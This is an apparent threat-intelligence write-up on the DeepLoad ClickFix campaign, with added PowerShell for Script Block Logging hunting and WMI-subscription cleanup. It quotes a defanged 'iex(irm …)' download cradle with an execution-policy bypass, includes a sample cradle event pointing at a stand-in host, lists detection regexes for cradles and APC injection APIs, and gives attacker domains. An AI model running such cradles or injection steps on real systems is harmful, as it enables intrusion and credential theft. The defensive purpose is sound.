ReliaQuest observed a fileless campaign, tracked as DeepLoad, that uses ClickFix social engineering to run an obfuscated PowerShell loader, compile an injector in memory, and perform APC process injection into trusted processes such as LockAppHost.exe, while a separate component steals credentials. The campaign persists via scheduled tasks, USB propagation, and hidden WMI event subscriptions, one of which reinfected a host days after apparent cleanup, so defenders should enable PowerShell Script Block Logging, audit WMI subscriptions, and rotate exposed credentials. #DeepLoad #ClickFix
Keypoints
- Initial access via ClickFix social engineering: users are tricked into pasting and running a command (powershell.exe -ep Bypass -Command "iex(irm hxxp://… )") that pulls the in-memory loader.
- The PowerShell loader pads itself with large amounts of filler code, likely AI-generated, and uses an XOR decryption routine to evade static scanning; the decoded payload is never written to disk.
- DeepLoad compiles a temporary C# DLL via Add-Type and injects shellcode into trusted processes (LockAppHost.exe, makecab.exe, Magnify.exe) using APC injection to run in-memory inside a legitimate host process.
- Credential theft runs independently via filemanager.exe and a malicious browser extension, capturing typed credentials, saved passwords, session tokens, and exfiltrating them over a separate C2 channel.
- The malware spread to removable USB drives by dropping disguised shortcut installers (e.g., ChromeSetup.lnk), enabling propagation to other hosts without operator interaction.
- Standard cleanup missed WMI event subscriptions used for persistence; a surviving subscription re-executed the attack three days after the host appeared clean.
- Detection recommendations: enable PowerShell Script Block Logging, monitor mshta.exe outbound callbacks and anomalous QueueUserAPC activity, audit and remove unknown WMI subscriptions, and rotate all credentials exposed during the infection window.
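As an added example (not ReliaQuest's code and not from the report), the PowerShell below turns on Script Block Logging and runs a small hunt over 4104 events for the loader traits listed above. The regexes and the sample events are constructed here; the `-bxor` pattern assumes the loader's XOR routine is written in PowerShell, which the report does not state.

```powershell
# Added example (not ReliaQuest's code): enable Script Block Logging and hunt
# 4104 events for the loader traits the report describes. Run as Administrator.

# 1. Enable Script Block Logging (the registry value behind the GPO setting
#    "Turn on PowerShell Script Block Logging"). Applies to new sessions.
$sblKey = 'HKLM:\SOFTWARE\Policies\Microsoft\Windows\PowerShell\ScriptBlockLogging'
New-Item -Path $sblKey -Force | Out-Null
Set-ItemProperty -Path $sblKey -Name EnableScriptBlockLogging -Value 1 -Type DWord

# 2. Regexes derived from the reported behaviour. The XOR pattern assumes the
#    loader decodes with PowerShell's -bxor operator (an assumption, not from
#    the report). "-ep Bypass" lives on the process command line, so it shows
#    up in 4688/Sysmon 1 rather than 4104; it is kept here for command-line input.
$Patterns = [ordered]@{
    'ClickFix download cradle' = 'iex\s*\(\s*irm\s'
    'Execution policy bypass'  = '-(ep|ExecutionPolicy)\s+Bypass'
    'In-memory C# compile'     = '\bAdd-Type\b'
    'APC injection API'        = 'QueueUserAPC|VirtualAllocEx|WriteProcessMemory'
    'XOR decode loop'          = '-bxor'
}

function Find-DeepLoadIndicators {
    # Returns one row per event whose script text matches at least one pattern.
    param([Parameter(Mandatory)] [object[]] $Events)
    foreach ($e in $Events) {
        $hits = foreach ($name in $Patterns.Keys) {
            if ($e.Message -match $Patterns[$name]) { $name }
        }
        if ($hits) {
            $text = $e.Message -replace '\s+', ' '
            [pscustomobject]@{
                TimeCreated = $e.TimeCreated
                Hits        = ($hits -join ', ')
                Snippet     = $text.Substring(0, [Math]::Min(90, $text.Length))
            }
        }
    }
}

# 3. Input. Live: uncomment to read the PowerShell operational log.
# $Events = Get-WinEvent -FilterHashtable @{
#     LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } -ErrorAction SilentlyContinue
# Offline: constructed sample events (not real telemetry) so the script runs anywhere.
$Events = @(
    [pscustomobject]@{ TimeCreated = Get-Date; Message = 'iex(irm hxxp://staging.example.invalid/index)' }
    [pscustomobject]@{ TimeCreated = Get-Date; Message = '$d = foreach ($b in $blob) { $b -bxor $k }; Add-Type -TypeDefinition $src' }
    [pscustomobject]@{ TimeCreated = Get-Date; Message = 'Get-ChildItem C:\Users | Measure-Object' }
)

Find-DeepLoadIndicators -Events $Events | Format-Table -AutoSize
```

The first two constructed events match (download cradle; XOR loop plus Add-Type), the third does not. Because the loader is padded with filler, match on the small set of operations it cannot avoid (the cradle, the compile, the injection APIs) rather than on the bulk of the script text.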
MITRE Techniques
- [T1204] User Execution – Attackers relied on ClickFix social engineering to get users to run attacker-supplied commands directly. ('ClickFix is a social engineering technique that gets users to run the attacker's commands themselves.')
- [T1059.001] PowerShell – The initial command used PowerShell with an execution policy bypass to retrieve and execute the loader in memory. ('powershell.exe -ep Bypass -Command "iex(irm hxxp://:3015/index)"')
- [T1218.005] Mshta (Signed Binary Proxy Execution) – mshta.exe was used to reach attacker staging infrastructure and pull down the obfuscated PowerShell loader. ('mshta.exe … reached the attacker's staging infrastructure and pulled down an obfuscated PowerShell loader.')
- [T1105] Ingress Tool Transfer – The loader and supporting components were retrieved from attacker-controlled staging infrastructure after the user-executed command. ('retrieves and executes the payload directly')
- [T1055] Process Injection – The campaign used APC injection: shellcode was written into a suspended process and its execution queued via QueueUserAPC. ('uses asynchronous procedure call (APC) injection … QueueUserAPC')
- [T1546.003] Event Triggered Execution: WMI Event Subscription – A permanent WMI event subscription (filter, consumer and binding) was created to re-execute the chain later, enabling reinfection after remediation; WMI as a one-off execution channel is T1047, but a subscription that persists is this sub-technique. ('WMI event subscription … re-executed the attack three days later')
- [T1555.003] Credentials from Web Browsers – The actor scraped stored browser passwords from hosts as part of credential theft. ('Stored credential scraping pulls saved browser passwords directly from the host.')
- [T1056.001] Input Capture: Keylogging – The campaign captured credentials as users typed them, intercepting live input rather than only stored secrets. ('DeepLoad captures credentials as users type them')
- [T1176] Browser Extensions – A malicious browser extension was dropped and registered to intercept and exfiltrate typed credentials and session data across browser sessions. ('drops and registers a malicious browser extension that captures credentials as users type them')
- [T1091] Replication Through Removable Media – The malware copied many deceptive shortcut files to connected USB drives to facilitate spread to other hosts. ('Over 40 files were written to the drive … ChromeSetup.lnk, Firefox Installer.lnk, AnyDesk.lnk')
- [T1041] Exfiltration Over C2 Channel – filemanager.exe communicated with a distinct C2 channel and exfiltrated harvested credentials independently of the main loader's channel. ('filemanager.exe uses a distinct command-and-control (C2) channel with failover domains')
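The surviving WMI subscription is the kind of artifact the following added example (not ReliaQuest's code and not from the report) enumerates: it lists every __FilterToConsumerBinding in root\subscription with its filter query and consumer payload, flags anything not on a short allow-list, and provides a removal function for use after review. The allow-list entry 'SCM Event Log Filter' is the binding Windows ships with; whether anything else on your build is legitimate is for you to confirm.

```powershell
# Added example (not ReliaQuest's code): enumerate permanent WMI event
# subscriptions so survivors like the one that reinfected the host can be
# reviewed and removed. Run as Administrator.

$Namespace = 'root\subscription'

# Default Windows binding that should not be flagged. Everything else is reviewed.
$KnownGoodFilters = @('SCM Event Log Filter')

function Get-RefName {
    # Binding properties are references: Get-CimInstance yields CimInstance
    # objects, the older Get-WmiObject yields path strings like __EventFilter.Name="x".
    param([object] $Ref)
    if ($Ref -is [string]) {
        if ($Ref -match 'Name="([^"]+)"') { return $Matches[1] }
        return $Ref
    }
    return $Ref.Name
}

function Get-WmiPersistence {
    # One row per filter-to-consumer binding, joined to its filter and consumer.
    $filters   = Get-CimInstance -Namespace $Namespace -ClassName __EventFilter
    $consumers = Get-CimInstance -Namespace $Namespace -ClassName __EventConsumer
    $bindings  = Get-CimInstance -Namespace $Namespace -ClassName __FilterToConsumerBinding
    foreach ($b in $bindings) {
        $fName = Get-RefName $b.Filter
        $cName = Get-RefName $b.Consumer
        $f = $filters   | Where-Object Name -eq $fName
        $c = $consumers | Where-Object Name -eq $cName
        [pscustomobject]@{
            FilterName    = $fName
            ConsumerName  = $cName
            ConsumerClass = $c.CimClass.CimClassName
            Trigger       = $f.Query
            # CommandLineEventConsumer carries a command line; ActiveScriptEventConsumer a script body.
            Payload       = if ($c.CommandLineTemplate) { $c.CommandLineTemplate } else { $c.ScriptText }
            Suspicious    = ($fName -notin $KnownGoodFilters)
        }
    }
}

function Remove-WmiPersistence {
    # Removes binding, filter and consumer for each suspicious entry. Run only after review.
    param([Parameter(Mandatory, ValueFromPipeline)] [object] $Entry)
    process {
        if (-not $Entry.Suspicious) { return }
        Get-CimInstance -Namespace $Namespace -ClassName __FilterToConsumerBinding |
            Where-Object { (Get-RefName $_.Filter) -eq $Entry.FilterName } |
            Remove-CimInstance
        Get-CimInstance -Namespace $Namespace -ClassName __EventFilter -Filter "Name='$($Entry.FilterName)'" |
            Remove-CimInstance
        Get-CimInstance -Namespace $Namespace -ClassName __EventConsumer -Filter "Name='$($Entry.ConsumerName)'" |
            Remove-CimInstance
        Write-Host "Removed WMI subscription $($Entry.FilterName) -> $($Entry.ConsumerName)"
    }
}

# Review first: an attacker subscription shows Suspicious = True with its trigger
# query and the command or script it launches.
Get-WmiPersistence | Format-List

# After review, uncomment to remove everything not on the allow-list:
# Get-WmiPersistence | Where-Object Suspicious | Remove-WmiPersistence
```

Read the Trigger and Payload columns rather than trusting the names: attacker filters are often given innocuous names, but the WQL query and the consumer's command line are what actually re-launch the loader. Record what you remove so the same binding can be hunted across other hosts.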
Indicators of Compromise
- [File name] credential stealer and payload artifacts – filemanager.exe, popup.html
- [File hash] artifact hashes as printed in the report – 6AABA685669D779EF8BE8F7F4231096CFA, AB450927B37E1B68E2BE68832C354AC600, and other hashes in the report
- [Domain] attacker staging and support infrastructure – holiday-updateservice[.]com, forest-entity[.]cc, and hell1-kitty[.]cc
- [URL path] USB-tracking C2 indicator – /t1_usb observed in traffic to attacker infrastructure
- [Shortcut filename] USB propagation artifacts disguised as installers – ChromeSetup.lnk, Firefox Installer.lnk
- [Process name] abused Windows processes – LockAppHost.exe (APC injection target), WmiPrvSE.exe (WMI provider host; a CommandLineEventConsumer launches its command as a child of this process, so loader launches from the subscription appear under it)